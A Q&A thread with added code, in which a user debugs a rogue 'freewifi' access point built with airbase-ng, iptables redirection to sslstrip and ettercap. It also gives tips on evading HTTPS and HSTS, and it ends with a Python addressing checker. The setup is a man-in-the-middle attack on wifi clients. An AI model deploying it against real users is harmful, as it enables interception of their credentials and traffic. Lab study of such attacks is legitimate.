
I'm trying to set up a fake AP using the aircrack-ng suite, a DHCP server and iptables.

After creating the fake AP:

airmon-ng start wlan1
airbase-ng -c 11 -e "freewifi" wlan1mon


Running the iptables configuration and at0 routing rules (bash file):

#!/bin/sh
ifconfig at0 up
ifconfig at0 10.0.0.1 netmask 255.255.255.0
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -P FORWARD ACCEPT
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
iptables -t nat -A POSTROUTING -o wlan0 -j MASQUERADE

Running the DHCP server: /etc/init.d/isc-dhcp-server start

/etc/dhcp/dhcpd.conf file:

authoritative;
default-lease-time 600;
max-lease-time 7200;
subnet 10.0.0.0 netmask 255.255.255.0
{
    option subnet-mask 255.255.255.0;
    option domain-name "freewifi";
    option routers 10.0.0.1;
    option domain-name-servers 194.90.0.1;
    range 10.0.0.10 10.0.0.20;
}

/etc/default/isc-dhcp-server file: isc-dhcp-server default

Running sslstrip and ettercap:

sslstrip -f -p -k 
ettercap -p -u -T -q -i at0

First, no internet connection is given: I can connect to my "freewifi" AP and I'm even given an IP address, but an internet connection can't be made: server not found.

Then I noticed that it has HTTPS in the address; sslstrip should strip the s from https, so that was odd as well.

I suspect that maybe I have a problem with my bridging (iptables), any help?

Kali Linux.

eyal360
  • Packet captures will tell all, I bet. – schroeder Jan 26 '17 at 13:05
  • Start simple, then add other stuff. You haven't included the existing network configuration (any overlap on 192.168.1.128/25?). Lastly, what's the difference between a real and fake AP? – domen Jan 26 '17 at 13:20
  • @domen well, at this moment I have one existing network, 192.168.1.1/24, and I "draw" my internet connection by using a subnet of that network, 192.168.1.128/25, using an ethernet cable and my iptables configuration. About the real and fake AP, there's not much of a difference; only I'm not using any "real" modem/router to provide my own internet access from an ISP, so it's called a fake AP. Though a fake AP and a real AP should work just the same. – eyal360 Jan 26 '17 at 14:13
  • @schroeder I will try it; the only thing that's weird to me is that this is the "global standard" method for the fake AP I see on every post about this subject, so I don't quite understand why it doesn't work for me. Be back with some new info I hope. – eyal360 Jan 26 '17 at 14:17
  • Well, one obvious issue is that you have two networks on 192.168.1.0/25. I hoped me asking real vs. fake would make you realise you need to search for "how to set up AP", without "fake" or "sslstrip" or whatever. And do go for simple first (separate /24 network, nothing fancy or weird, static IP, leave NAT for later, first confirm packets get forwarded one hop). When that works, improve, goto 10. – domen Jan 26 '17 at 15:47
  • @domen I understand what you are proposing, but if we take a look at the steps I make to create the AP, without sslstrip or ettercap, it should work just fine, since I only bridge between an internet provider (eth0) and an internet receiver (at0) by using NAT and a DHCP server to make that happen. I will try using a different sub-network than 192.168.1.128/25; I hope that is the reason. – eyal360 Jan 26 '17 at 20:04

1 Answer


You have different problems here. I think the access point and DHCP are ok. Let's talk about iptables and sslstrip.

On sslstrip, you are using the arguments -f -p -k 10000, but it makes no sense... port 10000 is the default. And to set the port you must use -l, so you can avoid its use. It should be sslstrip -f -p -k and that's all, or you can put sslstrip -f -p -k -l 10000, which is the same.

Talking about iptables and forwarding: echo 1 > /proc/sys/net/ipv4/ip_forward is ok. The route add makes no sense. You already have internet access on eth0 (I guess), so you don't need a route for the fake AP network. Of course the at0 IP must be in a different network range than eth0. Put a different IP range, something like 172.16.0.0/24 for example, or any other.

But the order of the rules in iptables is important. Masquerading must be done at the end. And you have a typo on the ssl port. You put 1000 instead of 10000!!!! <- OP edited his question and corrected it.

The flushes are ok:

iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain

And then, if you have the general FORWARD policy set to ACCEPT, it doesn't make sense to add FORWARD rules with -j ACCEPT like this: iptables --append FORWARD --in-interface at0 -j ACCEPT. Forget the rules about udp... web navigation is tcp, so this is not important: iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.1. The only point of doing this is to redirect DNS traffic to your own DNS server... But I can't see that you have a DNS server in this example, so it makes no sense.

This should be:

iptables -P FORWARD ACCEPT
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

And that's all.

So the final compilation is:

#!/bin/sh
ifconfig at0 up
ifconfig at0 192.168.1.129 netmask 255.255.255.128
ifconfig at0 mtu 1400
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -P FORWARD ACCEPT
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

Anyway, I can recommend to you a script on which I'm collaborating which automates all of this stuff and is very handy! It has a lot of FakeAP/Evil Twin features: airgeddon. Give it a try! It is a good script, already included in the BlackArch, Wifislax and ArchStrike repositories.

Good luck! And remember, to test sslstrip you must use URLs without explicitly putting https. And facebook is a bad starting point because of HSTS. Try with outlook.com, it works! Avoiding HSTS is more advanced; you'll need sslstrip2 (also called sslstrip+) and you'll need a proxy+dns (another incoming feature of airgeddon which is already developed and is in the testing phase; it is in a development branch and maybe this week could be in master).

OscarAkaElvis
  • Is it possible to bridge the internet connection between wlan0 and wlan1mon, and not eth0 and wlan1mon? Can any wireless method be an internet provider using bridging? I'm only asking because eth0 isn't working now for some reason, but wlan0 and wlan1 do work. – eyal360 Jan 29 '17 at 13:19
  • Also, I cant see the connection being made between at0 and eth0 , where is it shown in the "final compilation" you wrote? – eyal360 Jan 29 '17 at 13:35
  • All the connection you need between interfaces is to enable forwarding... then, it is supposed that you have on some interface (eth0, or wlan0 or whatever) internet access with a route pointing to 0.0.0.0. The interface which has the 0.0.0.0 route is what you need to put in the -o parameter of masquerading. – OscarAkaElvis Jan 29 '17 at 14:00
  • I have changed the script as you specified; I can sense a slight difference in the performance, as in the connection is faster and such. It is assigned an IP by the DHCP server, and using ettercap I can see its requests for an IP and ACKs from the DHCP server back (DHCP works). Above all that, I can't access the internet from my "victim", receiving the "server not found" message. **Any other suggestions?** About the tool you offered me, I'm trying to make it all manually, to learn a bit more about MITM attacks, so I will definitely try it in the nearest future! Thanks. – eyal360 Jan 29 '17 at 14:16
  • You are getting the server not found message, but only with the browser? I mean, can you ping the internet from the victim? Try to ping a Google DNS for example (8.8.8.8). If you can ping, the problem is now the sslstripping. If not, you have some problem with routing/forwarding/masquerading. – OscarAkaElvis Jan 29 '17 at 14:37
  • I can ping, and I didn't use sslstrip; at the moment I just want to see if I get a connection: [link]https://s27.postimg.org/n4be8x2tv/ping.jpg According to that I can ping an IP but not a domain name. – eyal360 Jan 29 '17 at 15:08
  • So you have a DNS problem. Put an internet DNS in your dhcp config: put `option domain-name-servers 8.8.8.8;`. If you keep `option domain-name-servers 192.168.1.129;` you should set up a DNS server too on that IP. It's easier to use internet DNS. – OscarAkaElvis Jan 29 '17 at 16:20
  • First off, the solution you gave me was on the mark, so thank you. I'm encountering another problem with connectivity to all websites: I can only access facebook, youtube and google search from the toolbar, and any other website shows "Unable to connect". I have tested my network speed; I thought maybe my internet connection is too slow or the MTU is having trouble fragmenting, but it's not the case. I can't wget or apt-get but I can ping. I have updated my question above with all the details; I would appreciate it if you take a look, thanks again. – eyal360 Jan 30 '17 at 09:15
  • Hey, so if your question was solved, mark it as solved please! And if you have more questions, don't hesitate to open another question. Anyway, it could be a good idea to remove the line `ifconfig at0 mtu 1400` to leave it at the default instead of setting it. – OscarAkaElvis Jan 30 '17 at 09:32
  • I have; I forgot to delete the MTU when I edited my question. I will post again, thanks. – eyal360 Jan 30 '17 at 09:44
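The two faults that the thread eventually narrows down to, an AP range that overlaps the uplink network (domen's comment and the answer's "different network range than eth0") and a DHCP-advertised DNS server that is the AP itself with nothing listening (the "can ping an IP but not a domain name" symptom), are both addressing-plan mistakes that can be checked before any interface is brought up. The following is an added example, not code from either participant: it parses the subnet block of the dhcpd.conf from the question and compares it with the addresses planned for at0 and the uplink interface. The `check_gateway` and `parse_dhcpd_subnet` functions and their findings are assumptions of this example; the embedded configuration string is copied from the question, and the interface addresses passed in are constructed.

```python
import ipaddress
import re

# Constructed sample: the dhcpd.conf from the question, copied verbatim.
DHCPD_CONF = """\
authoritative;
default-lease-time 600;
max-lease-time 7200;
subnet 10.0.0.0 netmask 255.255.255.0
{
    option subnet-mask 255.255.255.0;
    option domain-name "freewifi";
    option routers 10.0.0.1;
    option domain-name-servers 194.90.0.1;
    range 10.0.0.10 10.0.0.20;
}
"""


def parse_dhcpd_subnet(text):
    """Pull network, routers, DNS servers and lease range out of the first subnet block."""
    m = re.search(r"subnet\s+([\d.]+)\s+netmask\s+([\d.]+)\s*\{(.*?)\}", text, re.S)
    if not m:
        raise ValueError("no subnet block found")
    body = m.group(3)

    def option(name):
        om = re.search(rf"option\s+{name}\s+([^;]+);", body)
        return [ipaddress.ip_address(v.strip()) for v in om.group(1).split(",")] if om else []

    rm = re.search(r"range\s+([\d.]+)\s+([\d.]+)\s*;", body)
    return {
        "network": ipaddress.ip_network(f"{m.group(1)}/{m.group(2)}"),
        "routers": option("routers"),
        "dns": option("domain-name-servers"),
        "range": (ipaddress.ip_address(rm.group(1)), ipaddress.ip_address(rm.group(2))) if rm else None,
    }


def check_gateway(conf_text, ap_iface, uplink_iface, local_dns_running=False):
    """Compare the DHCP subnet block with the addresses planned for the AP interface (at0)
    and the uplink (eth0/wlan0), both given as 'address/prefix' strings.
    Returns a list of findings; an empty list means the addressing plan is self-consistent."""
    findings = []
    cfg = parse_dhcpd_subnet(conf_text)
    ap = ipaddress.ip_interface(ap_iface)
    uplink = ipaddress.ip_interface(uplink_iface)

    # 1. The AP network must not overlap the uplink network, or the kernel cannot route between them.
    if ap.network.overlaps(uplink.network):
        findings.append(f"AP network {ap.network} overlaps uplink network {uplink.network}; use a separate range")
    # 2. dhcpd must hand out addresses from the network actually configured on at0.
    if cfg["network"] != ap.network:
        findings.append(f"dhcpd subnet {cfg['network']} does not match the AP interface network {ap.network}")
    # 3. Clients need the AP's own address as default gateway for forwarding and MASQUERADE to apply.
    for router in cfg["routers"]:
        if router != ap.ip:
            findings.append(f"option routers {router} is not the AP interface address {ap.ip}")
    # 4. The lease range must lie inside the subnet and must not include the gateway itself.
    if cfg["range"]:
        low, high = cfg["range"]
        if low > high or low not in cfg["network"] or high not in cfg["network"]:
            findings.append(f"range {low}-{high} is not inside {cfg['network']}")
        elif low <= ap.ip <= high:
            findings.append(f"range {low}-{high} includes the gateway address {ap.ip}")
    # 5. A DNS server inside the AP network only works if something answers there; otherwise
    #    clients can ping by IP but every name lookup fails ("server not found").
    for dns in cfg["dns"]:
        if dns == ap.ip and not local_dns_running:
            findings.append(f"DNS server {dns} is the AP itself but no resolver runs there; use an upstream resolver such as 8.8.8.8")
        elif dns in ap.network and dns != ap.ip:
            findings.append(f"DNS server {dns} is inside the AP network but is not the AP; nothing will answer it")
    return findings


if __name__ == "__main__":
    # Constructed uplink address inside the 192.168.1.128/25 range the question mentions.
    for finding in check_gateway(DHCPD_CONF, "10.0.0.1/24", "192.168.1.130/25") or ["no findings"]:
        print(finding)
```

Run against the question's 10.0.0.0/24 plan the checker reports nothing, which matches the answer's view that DHCP was fine; run against the answer's final script (at0 on 192.168.1.129/25 with the existing 192.168.1.1/24 network on the uplink, and DNS pointed at 192.168.1.129) it reports both the overlap and the missing resolver.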